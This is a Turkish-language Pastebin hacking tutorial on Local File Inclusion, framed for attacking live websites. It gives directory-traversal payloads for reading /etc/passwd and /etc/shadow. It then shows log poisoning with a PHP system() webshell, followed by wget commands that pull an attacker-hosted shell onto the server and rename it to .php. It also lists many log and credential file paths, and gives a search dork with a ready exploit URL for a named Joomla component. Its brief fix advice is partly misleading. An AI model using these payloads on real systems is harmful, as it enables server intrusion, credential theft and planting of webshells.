KingSkrupellos

Local File Inclusion LFI Hacking Method Geniş Anlatım

Sep 28th, 2017
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.64 KB | None | 0 0
  1. Local File Inclusion LFI Hack Geniş Döküman + Videolu Anlatım
  2.  
  3. Konu => https://www.cyberizm.org/cyberizm-local-file-inclusion-lfi-hack-genis-dokuman-videolu-anlatim.html
  4.  
  5. Yöntem => Local File İnclusion ( LFI ) Yerel(serverdan) dosya dahil etme.
  6. Anlatım => KingSkrupellos
  7. 14 Farklı Videolu Anlatımlar
  8. [code] http://www.youtube.com/watch?v=s3XQ1n5kdeQ
  9. http://www.youtube.com/watch?v=KGKIBA8CdHY
  10. http://www.youtube.com/watch?v=Vv2iBqpTyZQ
  11. http://www.youtube.com/watch?v=pnqcHU2qFiA
  12. http://www.youtube.com/watch?v=UP7a_hXSsUE
  13. http://www.youtube.com/watch?v=oWU5NmO7Af8
  14. http://www.youtube.com/watch?v=K7kKA7kEvY0
  15. http://www.youtube.com/watch?v=KGKIBA8CdHY
  16. http://www.youtube.com/watch?v=wLI1Z_cKQ18
  17. http://www.youtube.com/watch?v=j1ubQruirxk
  18. http://www.youtube.com/watch?v=s_o4yTrBgtQ
  19. http://www.youtube.com/watch?v=kGZNvUSWDqg
  20. http://www.youtube.com/watch?v=1pZnOHzdV7o[/code]
  21. Rfi kadar işlevselliği olmayan ama her Hacker adayı için bilmesi gereken bir açık türü olan LFI yi anlatacağım.
  22. LFI Sayesinde Saldırdığınız Scriptin Bulunduğu Sistemdeki Dosyaları Okuyabilirsiniz. Örn Linux Sistemlerde etc/passwd Gibi veya Scriptin Config.php Ayarları Gibi. RFI Kadar Olmasada Bayağı Yararı Vardır..
  23. Scriptlerde LFI Ararken RFI’deki Gibi Include, Require, Define vs. Ana Komutlarını Arıyoruz.Mantık Olarak RFI iLe Aynı…
  24. LFI Bulduktan Sonra Bazı Önemli Dosya İsimlerini Vereyim
  25. [code] /etc/passwd
  26. /etc/shadow
  27. /etc/group
  28. /etc/security/group
  29. /etc/security/passwd
  30. /etc/security/user
  31. /etc/security/environ
  32. /etc/security/limits
  33. /usr/lib/security/mkuser.default [/code]
  34. gibi..
  35. 1) Mesela ; http://www.hedefsite.com/index.php?id=9 burası sadece id değil (cat,c,home vs.) gibi de olabilir URL’sindeki id değerini yani 9 silelim eğer şöyle bir hata ile karşılaşırsak demek ki LFİ açığı vardır.
  36.  
  37. Hata: Warning: include(company_data/.php) [function.include]: failed to open stream: No such file or directory in /usr/home/posting/public_html/resources/index.php on line 171
  38. LFI nasıl oluşur ?
  39.  
  40. Öncelikle bir php sayfası üzerinden olayın mantığını anlatmaya çalışayım.
  41.  
  42. [code] #Dosya adı : test.php
  43. <?php
  44. include($_GET[’sayfa’.".php");
  45. ?> [/code]
  46.  
  47. Gibi bir kod yazdık.Sayfa normalde şu şekilde çalışır.include ile bir dosya dahil edilir ve o dosya da sayfada gelen GET değişkeninden alır sayfa adını.
  48.  
  49. Örneğin browserimize :
  50.  
  51. [code]http://localhost/test.php?sayfa=haber
  52.  
  53. dediğimizde $_GET[’sayfa’] değeri haber olacaktır ve yukarıdaki koda dikkat ederseniz .php ile getirmiş devamına yani gelen değişkenin içerisindeki veriyi alırsak kısmen şu şekilde oluyor;
  54.  
  55. [code]<?php
  56. #Dosya adı : test.php
  57. include("haber.php");
  58. ?> [/code]
  59.  
  60. Olayı anladıysanız eğer browserimizden gelen isteği sayfamıza eklemeye çalışıyor.Tabi bu illa include olacak değil.Değişik yollar da olabilir.Örnek vermek gerekirse;
  61.  
  62. [code]include();
  63. include_once();
  64. require();
  65. require_once();
  66. file();
  67. file_get_contents();[/code]
  68.  
  69. Gibi fonksiyonlarla beraber de çağırılabilir.
  70.  
  71. Bu örneklere dayanarak şunları söyleyebiliriz o halde;
  72. Local file inclusion metodu aslında browserden değişken alarak ve alınan dosyayı sayfaya dahil eden sayfalarda meydana gelir ve browserimizde istediğimiz sayfamızı ( haber.php ’yi ) açtık.Sayfa da hiç bir sorunumuz yok.Ama sizce sayfa bu kadar masum mu ?
  73.  
  74. Şimdi örneklerle nasıl hata verdirip nasıl kullanacağımız konusuna bakalım.
  75.  
  76. Hata verdirme :
  77.  
  78. Evet en son hatırlarsanız browserimizde http://localhost/test.php?sayfa=haber yazmıştık ve haber.php sayfamızı çağırmıştık. Şimdi browserde biraz oynama yaparak hata verdirmeye çalışalım.
  79.  
  80. Örnek 1 :
  81.  
  82. [code]http://localhost/test.php?sayfa=/etc/passwd[/code]
  83.  
  84. Yazdığımız zaman karşımıza hata vermiş bir sayfa çıkacaktır.
  85.  
  86. [code]Warning: main(/etc/passwd): failed to open stream: No such file or directory in /usr/www/www.Cyber-warrior.org/www/test.php on line 5
  87.  
  88. Warning: main(): Failed opening ’/etc/passwd’ for inclusion (include_path=’.:’) in /usr/www/www.Cyber-warrior.org/www/test.php on line 6[/code]
  89.  
  90. Evet hata verdirmeyi başardık.Şimdi yukarıdaki hatayı açıklayalım. PHP bize ne gibi bilgiler vermeye çalışmış ve bu bilgileri ne yapabiliriz ne işimize yarar ?
  91.  
  92. Yukarıda ilk dikkat edeceğimiz failed to open stream No such file or directory oluyor.Bu bize öyle bir sayfanın o dizinde bulunmadığını gösterir.Hemen biraz daha ileriyi okuyoruz web sitenin sunucudaki adresini bize veriyor.Bunu bir yere not edelim.Ve bakıyoruz ki bizim istediğimiz /etc/passwd sayfası bu dizinde değil. Nerdeki acaba ? Linux sunucular da ana dizin ( root directory ) dediğimiz dizinde bulunurlar.Peki buraya nasıl erişebilirim ? Az önce not edin dediğim dosya yolunu kullanarak ulaşabiliriz.Ama bundan önce kaç dizin olduğunu saymamız lazım.
  93. Dizinleri parçalayarak yazalım ki kaç dizin yazacağımızı hesaplayalım ( / ) işaretinden itibaren parçalayın
  94.  
  95. Server dizini : [code]usr/www/www.Cyber-warrior.org/www/test.php
  96.  
  97. /usr ( 1 .ci dizin )
  98. /www ( 2 .ci dizin )
  99. /www.Cyber-warrior.org ( 3. cü dizin )
  100. /www ( 4. cü dizin )
  101. /test.php ( şu an bulunduğumuz dizin ) [/code]
  102.  
  103. İstediğimiz sayfa = /etc/passwd
  104.  
  105. Evet dizinlerimizi parçaladık ve bakıyoruz ki 4 dizin var.Hemen istediğimiz sayfa ile dizin sayımızı birleştiriyoruz.
  106.  
  107. [code]../../../../etc/passwd[/code]
  108.  
  109. buradaki her bir ../ işareti bir üst dizin anlamına geliyor.4 tane üst dizinin üstündeki /etc/passwd dosyasını istemiş olduk.Ve browserimizdeki adresi şöyle değiştirerek
  110.  
  111. [code]http://localhost/test.php?sayfa=../../../../etc/passwd[/code]
  112.  
  113. Gelen veriye baktığımızda
  114.  
  115. [code]# $FreeBSD$ #
  116. root:*:0:0:RMx &:/root:/usr/local/bin/bash[/code]
  117.  
  118. Ve devamı..
  119.  
  120. Evet bu şekilde passwd dosyasını okuyabildik.İşte şu ana kadar yaptıklarımızı klasik türk sitelerinde bulunanlar kadardı biz işi daha ileriye götürüyoruz. LFI üzerinden RCE ( Remote Command Execution = Uzaktan komut çalıştırma ) metodunu yaparak işlem yapabilir doyumsuz olan arkadaşlarımızın işini görmüyorsa RFI ( Remote file include = Uzakdan bir dosya dahil etme ) metodunu da ekleyebilir.
  121.  
  122. Şimdi işin bu kısmına kadar anladıysak işimiz bundan sonra biraz daha zorlaşacaktır.File inclusion metodları genelde bir linux sever için basittir.
  123.  
  124. Şimdi de biraz konumuzun dışında olan bir şeyden bahsetmek istiyorum.Bilirsiniz web sitelerin çalışma mantığını.Siz web adresini yazarak girersiniz web sitede içinde olan sayfa veya veritabanı bilgilerini size sunar.Peki eğer istediğim şey o sayfada veya saayfalarda veya sunucu da yoksa ? işte o zaman sunucu tarafından ( apache veya internet information services ( IIS ) )tarafından hatalar bir hata sayfasına yazdırılırlar.Eğer ki root admin ( sunucu yöneticisi ) sunucunun kurulumuyla beraber gelen dosya yollarını değiştirmediyse istediğiniz sayfa veya veri hata olarak yazdırılırlar.Peki bu benim ne işime yarayacak ?
  125.  
  126. Aslında bir çok şeye.Local file include metodnun can alıcı noktası da burada zaten.Eğer ben o web siteye girip de sayfaya örnek olarak şöyle bir istek attığımda da verileri yazdırmaz mı ?
  127.  
  128. [code]http://localhost/<?php phpinfo(); ?> [/code]
  129.  
  130. BİLGİ :
  131. [code]<?php phpinfo(); ?> [/code]
  132. ne demektir ?
  133.  
  134. php nin information fonksiyonudur. Bize server ve serverdaki php ve birkaç kütüphane hakkında bilgi verir...Dissabled & enabled functions ’lara bakarak ne kullanacağımızı göre biliriz.
  135.  
  136. Elbetteki yazdırır...
  137.  
  138. Ama bunu yazdığına göre ben buraya istediğim şeyi yazdırarak komut çalıştırabilirim ( farkındaysanız yavaş yavaş RCE metoduna giriyoruz .) O halde istediğim sayfayı değiştiriyorum ve şöyle yapıyorum.
  139.  
  140. [code]http://localhost/<?php system("ls -la"); ?> [/code]
  141.  
  142. yada şöyle bir veri göndereyim ls -la ve diğer shell komutlarımı kullanmak için GET ile bir istek yapayım.
  143.  
  144. [code]http://localhost/<?php system($_GET[’mgg’]); ?> [/code]
  145.  
  146. BİLGİ :
  147.  
  148. [code]<?php system("ls -la"); ?> [/code]
  149. nedir ?
  150.  
  151. php de bulunan system fonksiyonu windows ise ms dos linux ise shell üzerinden komut çalıştırmamıza yarar. $_GET[’mgg’]; ise mgg den gelen bilgi anlamına gelir.mggden gelen bilgiyi sistem üzerinde çalıştır demek olur.
  152.  
  153. Bunu yaptığımızda ne olacak ? hemen bir hata sayfası..
  154.  
  155. 404 This page not found
  156.  
  157. Adında bir hata sayfası getirecektir.Böylelikle ne yapmış olduk ? Sunucu tarafından kaydedilen hata raporlarına php kodu enjekte etmiş olduk..Peki kodu enjekte ettik nasıl kullanacağım ben bunu ?
  158.  
  159.  
  160. Aslında kullanması da basit.Sadece server tipine göre hangi dosyaya enjecte etmişseniz o dosya üzerinden kullanabilirsinz.Yine bir varsayım yapalım.
  161.  
  162. Örnek olarak atak yaptığım web sitenin kayıt yolu bu olsun;
  163.  
  164. [code]/apache/logs/access.log[/code]
  165.  
  166. bunu kendi sistemimize uyarlıyoruz.
  167.  
  168. ve şöyle oluyor;
  169.  
  170. [code]http://localhost/test.php?sayfa=../../../../apache/logs/acces.log[/code]
  171.  
  172. Browsermizden bu adrese girdiğimiz zaman web siteye yapılan istekler örüntülenecektir.Dolaysıyla bizim kodumuz da orda olacaktır.Şimdi dosyamızı ve nerde olduğunu da bildiğimize göre dosyamızı çalıştırabiliriz.
  173.  
  174. [code]http://localhost/test.php?sayfa=../../../../apache/logs/acces.log&mgg=ls -la[/code]
  175.  
  176. Peki şimdi ne yaptık ? mgg ile linuxun dosya ve dizin listeleme metodu olan ls -la ile o an klasördeki dosyaları görmek istedik ve sonucu bize aynen döndürecektir.
  177.  
  178. Şimdi LFI atağını RCE ye çevirdiğimize göre RCE atağını da RFI ye çevirelim. Linux’un wget fonksiyonunu kullanarak web siteye dosyamızı çekelim...
  179.  
  180. [code]http://localhost/test.php?sayfa=../../../../apache/logs/acces.log&mgg=wget
  181. http://siteniz.com/shell_adresiniz.php[/code]
  182.  
  183. Bu şekilde dosyanızı çekebilirsiniz.Tabi bazen sorun oluyor.İşte aksilik Şöyle bir senaryo daha üretelim ve işimizi zorlaştıralım ( gerçi kolay ama) wget ile php dosyalarını çekemeyebiliriz ( başıma çok geldiğinden söylüyorum bunu da ) o zaman kendi dosya çekeceğimiz siteye .txt uzantısında dosyamızı atıyoruz.Ve şöyle birşey yazıyoruz.
  184.  
  185.  
  186. [code]http://localhost/test.php?sayfa=../../../../apache/logs/acces.log&mgg=wget
  187. http://siteniz.com/shell_adresiniz.txt[/code]
  188.  
  189. Bu şekilde genelde çeker.Ne yapmış olduk txt dosyasını servera yüklemiş olduk.Fakat txt halinde çalışmaz bunun uzantısını değiştirelim.Onu da şöyle yapabiliriz.
  190.  
  191.  
  192. [code]http://localhost/test.php?sayfa=../../../../apache/logs/acces.log&mgg=mv shell_adi.txt shell_adi.php[/code]
  193.  
  194. Bu şekilde dosyanın adını değiştirmeden uzantısını değiştirdik.İsterseniz adını da değiştirebilirsiniz size kalmış bir olaydır.
  195.  
  196.  
  197.  
  198.  
  199.  
  200. Sunucu tipine göre dizinler ve komutlar;
  201.  
  202. IRIX:
  203.  
  204. [code]/var/adm/SYSLOG
  205. /var/adm/sulog
  206. /var/adm/utmp
  207. /var/adm/utmpx
  208. /var/adm/wtmp
  209. /var/adm/wtmpx
  210. /var/adm/lastlog/username
  211. /usr/spool/lp/log
  212. /var/adm/lp/lpd-errs
  213. /usr/lib/cron/log
  214. /var/adm/loginlog
  215. /var/adm/pacct
  216. /var/adm/dtmp
  217. /var/adm/acct/sum/loginlog
  218. /var/adm/X0msgs
  219. /var/adm/crash/vmcore
  220. /var/adm/crash/unix[/code]
  221.  
  222.  
  223. AIX:
  224.  
  225. [code]/var/adm/pacct
  226. /var/adm/wtmp
  227. /var/adm/dtmp
  228. /var/adm/qacct
  229. /var/adm/sulog
  230. /var/adm/ras/errlog
  231. /var/adm/ras/bootlog
  232. /var/adm/cron/log
  233. /etc/utmp
  234. /etc/security/lastlog
  235. /etc/security/failedlogin
  236. /usr/spool/mqueue/syslog[/code]
  237.  
  238.  
  239. SunOS:
  240.  
  241. [code]/var/adm/messages
  242. /var/adm/aculogs
  243. /var/adm/aculog
  244. /var/adm/sulog
  245. /var/adm/vold.log
  246. /var/adm/wtmp
  247. /var/adm/wtmpx
  248. /var/adm/utmp
  249. /var/adm/utmpx
  250. /var/adm/log/asppp.log
  251. /var/log/syslog
  252. /var/log/POPlog
  253. /var/log/authlog
  254. /var/adm/pacct
  255. /var/lp/logs/lpsched
  256. /var/lp/logs/lpNet
  257. /var/lp/logs/requests
  258. /var/cron/log
  259. /var/saf/_log
  260. /var/saf/port/log[/code]
  261.  
  262. Linux:
  263.  
  264. [code]/etc/httpd/logs/error.log
  265. /etc/httpd/logs/error_log
  266. /etc/httpd/logs/access.log
  267. /etc/httpd/logs/access_log
  268. /etc/wtmp
  269. /etc/utmp
  270. /opt/lampp/logs/error_log
  271. /opt/lampp/logs/access_log
  272. /var/log/lastlog
  273. /var/log/telnetd
  274. /var/run/utmp
  275. /var/log/secure
  276. /var/log/wtmp
  277. /var/run/utmp
  278. /var/log
  279. /var/adm
  280. /var/apache/log
  281. /var/apache/logs
  282. /var/apache/logs/access_log
  283. /var/apache/logs/error_log
  284. /var/log/acct
  285. /var/log/apache/access.log
  286. /var/log/apache/error.log
  287. /var/log/apache-ssl/error.log
  288. /var/log/apache-ssl/access.log
  289. /var/log/auth.log
  290. /var/log/xferlog
  291. /var/log/message
  292. /var/log/messages
  293. /var/log/proftpd/xferlog.legacy
  294. /var/log/proftpd.access_log
  295. /var/log/proftpd.xferlog
  296. /var/log/httpd/error_log
  297. /var/log/httpd/access_log
  298. /var/log/httpsd/ssl.access_log
  299. /var/log/httpsd/ssl_log
  300. /var/log/httpsd/ssl.access_log
  301. /etc/mail/access
  302. /var/log/qmail
  303. /var/log/smtpd
  304. /var/log/samba
  305. /var/log/samba-log.%m
  306. /var/lock/samba
  307. /root/.Xauthority
  308. /var/log/poplog
  309. /var/log/news.all
  310. /var/log/spooler
  311. /var/log/news
  312. /var/log/news/news
  313. /var/log/news/news.all
  314. /var/log/news/news.crit
  315. /var/log/news/news.err
  316. /var/log/news/news.notice
  317. /var/log/news/suck.err
  318. /var/log/news/suck.notice
  319. /var/log/thttpd_log
  320. /var/log/ncftpd/misclog.txt
  321. /var/log/ncftpd.errs
  322. /var/log/auth
  323. /var/log/kern.log
  324. /var/log/cron.log
  325. /var/log/maillog
  326. /var/log/qmail/
  327. /var/log/httpd/
  328. /var/log/lighttpd
  329. /var/log/boot.log
  330. /var/log/mysqld.log
  331. /var/log/secure
  332. /var/log/utmp
  333. /var/log/wtmp
  334. /var/log/yum.log
  335. /var/spool/tmp
  336. /var/spool/errors
  337. /var/spool/logs
  338. /var/spool/locks
  339. /var/www/log/access_log
  340. /var/www/log/error_log
  341. /var/www/logs/access.log
  342. /var/www/logs/error.log
  343. /var/www/logs/error_log
  344. /var/www/logs/access_log
  345. /root/.ksh_history
  346. /root/.bash_history
  347. /root/.bash_logut
  348. /usr/local/apache/log
  349. /usr/local/apache/logs
  350. /usr/local/apache/logs/access_log
  351. /usr/local/apache/logs/error_log
  352. /usr/local/apache/logs/access.log
  353. /usr/local/apache/logs/error.log
  354. /usr/local/etc/httpd/logs/access_log
  355. /usr/local/etc/httpd/logs/error_log
  356. /usr/local/www/logs/thttpd_log[/code]
  357.  
  358. Windows:
  359.  
  360. [code]c:\Program Files\Apache Group\Apache\logs\error.log
  361. c:\Program Files\Apache Group\Apache\logs\access.log
  362. c:\apache\logs\error.log
  363. c:\apache\logs\access.log[/code]
  364. Local File Inclusion: Bu açıklar RFI dan daha az kullanılmaktadır ve etkiside RFI kadar yoktur.Biraz hakkında konuşalım LFI’nın:). Gene php coderların acemilikleri veya unutkanlıklarından meydana gelen açıklardır.LFI ile bir sitenin ftp’sindeki veya serverdaki dosyaları okuma iznimiz varsa okuyabiliriz.Her RFI açıgını bir LFI gibi kullanabiliriz ama ortada bir remote file include imkanımız varken local file include yapmamız saçma olur.
  365. Bir örnekle açıklayalım;)
  366. [code]<?
  367. include (’files/$cw/config.php’) ;
  368. ?> [/code]
  369. Bu kodu test3.php olarak save edip php destekleyen bir servera atıp çalıştırdıgımızda gene hata alacagızdır,bunun neden, config.php nin bulunamamasıdır.Bu bizim için fark etmez bizim amacımız farklı.
  370. Bu koddaki $cw veriablı tanımlı değildir bu yüzden aşagıdaki bir komutla okuma izni olan tüm dosyaları okuyabiliriz.
  371. [code]www.siteismi.com/test3.php?cw=../../../../etc/passwd
  372. ben üstte serverın /etc/passwd dosyasını okudum siz isterseniz başka dosyalarıda okuyabilirsiniz.
  373. [code]<?
  374. $cw : ‘conf’ ;
  375. include (’files/$cw/config.php’) ;
  376. ?> [/code]
  377.  
  378. Bu dosyayı test4.php olarka save edip php destekleyen bir hostta attıgınızda LFI açıgının çalışmadıgını göreceksiniz.Bunun nedeni $cw : ‘conf’ ; bu kod ile tanımlı olmayan $cw veriablı tanımlanmıştır.Yani sepet doldurulmuştur.
  379. Son zamanların en çok kullanılan ve hostingcilerin başına en çok bela açan açıkların başında gelmektedir.
  380. File Inclusion açıklarından yararlanarak servera upload edilen php shell’lerden nasıl korunurum diye düşünüyorsanız işte cevabı….
  381. [code]/etc/php.ini[/code]
  382. dosyasını açın
  383. disable_function satırını buluyoruz ve karşısına bunları ekliyoruz.
  384.  
  385. system,passthru,exec,popen,proc_close,proc_get_sta tus,proc_nice,proc_open,
  386. allow_url_fopen,shell,shellexec,execute
  387. [code]service htttpd restart[/code]
  388. diyoruz
  389. NOT: Bu fonksiyonlar disable yapıldıgında bazı scriptler serverınızda çalışmayacaktır ama bu açıklardan da korumuş olacaksınız.
  390. Kullanımını Anlatayım
  391.  
  392. [code]<?php
  393. include (‘data/$miller/function.php’);
  394. ?> [/code]
  395. burda gördünüz gibi rfi olarak düşünürsen miller
  396. tanımlanmamış .
  397. fakat bu lfi de shell olarak kullanılamaz tanımlanmayan degişken (miller)kullanılarak dosya okunabilir yukarıdaki kodu robot.php olarak kaydedin
  398. Daha sonra
  399. [code]http://www.siteismi.com/robot.php?miller=../../../cyberizm[/code]
  400. dosyası okunabilir izin varsa okunur bu
  401. açıkla neler yapılır ?
  402. etc/passwd , config okuruz ya da ftp alırız …
  403. LFI açığını Nasıl Kapatırız ?
  404.  
  405.  
  406. [code]<?php
  407. $miller=’sdwd’
  408. include (‘data/$miller/function.php’);
  409. ?> [/code]
  410.  
  411.  
  412. bu kod sayesinde açık kapaır çünkü miller ‘i burda tanımladık
  413. [code]http://www.siteismi.com/robot.php?miller=../../../cyberizm[/code]
  414. yaptığınız an LFI çalışmaz
  415. Örnek LFI :
  416.  
  417. [code]http://www.siteismi.com/view.php?list=..%2F..%2F..%20%2F..%2F..%2F..%2F..% 2F..%2F..%2F..%2Fetc%2Fpasswd[/code]
  418. Not: Lfi açığı olan sisteme kod enjekte edilmiş bir jpg dosya atılarak server üzerinde işlem yapılabilir.
  419. Not 2 => Ben size yeni bir açık ismi veriyim
  420. Dork :
  421. [code]inurl:components/com_acooldebate/acooldebate.php[/code]
  422. Tam olarak yapılacak iş : Sitenin açığına exploit sokup ya da Password okuyum işleri halletmek
  423.  
  424. [code]http://site/joomla yolu/index.php?option=com_acooldebate&controller={LFI}[/code]
  425. Ben size bikaç ornek veriyim :.
  426. Ftp okumak istiyorsanız :
  427. [code]http://site/joomla yolu/index.php?option=com_acooldebate&controller=../../../../../../../../../../etc/passwd[/code]
  428.  
  429. Anlatacaklarım bu Kadar. KingSkrupellos. Emeğe Saygı.
Add Comment
Please, Sign In to add comment